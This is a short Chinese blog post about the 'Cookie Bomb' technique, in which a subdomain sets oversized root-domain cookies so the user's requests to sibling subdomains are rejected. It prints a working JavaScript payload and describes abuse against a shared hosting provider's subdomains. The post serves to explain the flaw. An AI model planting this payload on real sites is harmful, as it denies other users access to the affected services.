首页 > 技术 > Cookie Overdose
2014
07-02

Cookie Overdose

http://www.acunetix.com/blog/web-security-zone/cookie-overdose/

http://homakov.blogspot.de/2014/01/cookie-bomb-or-lets-break-internet.html

就是在一个子域中设定一个根域大的cookie(超过4K),通常网站的配置是拒绝响应这种请求,这样会导致该用户访问其他任何子域都打不开。

示例js:

var base_domain = document.domain.substr(document.domain.indexOf(‘.’));
var pollution = Array(4000).join(‘a’);
if(confirm(‘Should I Cookie Bomb ‘+base_domain+’?')){
for(var i=1;i<99;i++){
document.cookie=’bomb’+i+’='+pollution+’;Domain=’+base_domain;
}
}

 

有没有很眼熟啊,跟之前Apache的那个超大cookie泄露,导致可以获取httponly一样的代码。

那么这样会产生什么危害呢?

一个提供二级域名的空间商,你申请一个,然后设置一个超大cookie,然后有人来点击看了你的空间之后,这个人再访问空间商的其他二级域名,你也都打不开了……

 

原文地址:http://zone.wooyun.org/content/13439

最后编辑:
作者:M′
屌丝一枚。